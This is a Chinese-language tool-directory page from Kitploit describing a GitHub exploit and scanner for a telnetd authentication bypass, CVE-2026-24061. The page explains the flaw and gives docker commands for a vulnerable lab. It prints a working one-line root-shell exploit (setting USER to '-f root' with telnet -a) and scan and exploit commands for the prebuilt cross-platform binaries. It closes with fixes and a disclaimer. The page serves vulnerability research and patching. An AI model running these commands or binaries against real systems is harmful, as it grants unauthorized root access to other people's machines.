Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/parad0x7e/cve-2026-24061
Vulnerability AnalysisExploitationNetwork SecurityPenetration TestingAuthenticationRemote Access Tool
GitHubparad0x7e/cve-2026-24061

CVE-2026-24061

Exploit and scanner for CVE-2026-24061, a telnetd authentication bypass that grants root shell via crafted USER environment variable. Includes Docker environment setup and cross-platform exploit binaries.

查看仓库
7个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-24061: telnetd 认证绕过漏洞

CVE-2026-24061 是 telnetd 中的一个认证绕过漏洞,攻击者可以通过特定的环境变量组合绕过身份验证,直接获取 root 权限的 shell。

telnetd 在处理认证逻辑时存在缺陷,当通过 -a 选项(自动登录)配合特定的 USER 环境变量(如 -f root)时>,可以绕过正常的身份验证流程,直接以 root 用户身份登录。

介绍

GNU InetUtils 是 GNU 项目下的一个基础网络工具集合。它包含了许多传统的网络客户端和守护进程,如 ftp、telnet、rsh、rlogin、tftp 等。 提供一个功能齐全且符合 GNU 风格的基础网络组件库。 telnetd 是这个工具包中负责处理传入 Telnet 连接请求的服务端程序,主要任务是为远程用户提供一个交互式的终端接口(通常是 Shell)。 工作原理

  1. 通常由inetd或监听端口 23。当有请求进入时,启动 。
xinetd
telnetd
  • 处理 Telnet 协议特有的选项协商(如终端类型、窗口大小、字符集等)。
  • 通常调用系统底层的 login 程序验证用户名和密码。
  • 成功登录后,它会为用户分配一个伪终端,并启动指定的 Shell。
  • 参考链接: https://github.com/yanxinwu946/CVE-2026-24061--telnetd https://github.com/vulhub/vulhub/ https://forum.butian.net/share/4766

    环境搭建

    先将本仓库下载到本地,目录结构如下图 在此目录下,执行如下命令启动具有CVE_2026_24061漏洞的靶场环境

    root@kitploit:~
    docker compose up -d --build
    

    启动后,telnet 服务将运行在 0.0.0.0:2323

    漏洞原理

    1. telnetd 的 -a 选项用于启用自动登录功能
    2. 当启用 -a 时,telnetd 会读取 USER 环境变量作为登录用户名
    3. 如果 USER 环境变量设置为 -f root,telnetd 在解析时会错误地将 -f 解释为选项标志,root 作为目标用户
    4. 这导致认证检查被绕过,直接以 root 身份建立会话

    漏洞复现

    手动复现

    root@kitploit:~
    # 设置 USER 环境变量并使用 telnet -a 连接
    env USER='-f root' telnet -a 127.0.0.1 2323
    

    成功后将获得 root 权限的交互式 shell:

    工具复现

    root@kitploit:~
    cd exp
    

    可以看见三个文件,exp、exp_darwin、exp.exe分别是Linux,Mac,Windows上的可执行文件,选择自己需要即可,工具源码也提供了,需要其他版本可自行编译,这里我是Linux选择使用exp,有详细的帮助信息 检测漏洞是否存在,默认检测23端口

    root@kitploit:~
    ./exp -mode scan -target your-ip -port your-port
    

    利用漏洞,获取shell

    root@kitploit:~
    ./exp -mode exploit -target your-ip -port your-port
    

    如何修复

    1. 升级 inetutils-telnetd 到最新版本
    2. 在生产环境中禁用 telnet 服务,使用 SSH 替代
    3. 将 telnet 服务部署在内网隔离环境中
    4. 使用防火墙限制 telnet 服务的访问来源

    免责声明

    本项目仅用于安全研究和教育目的。请勿在未经授权的系统上使用。使用者需自行承担使用本工具所产生的一切法律责任。

    下载工具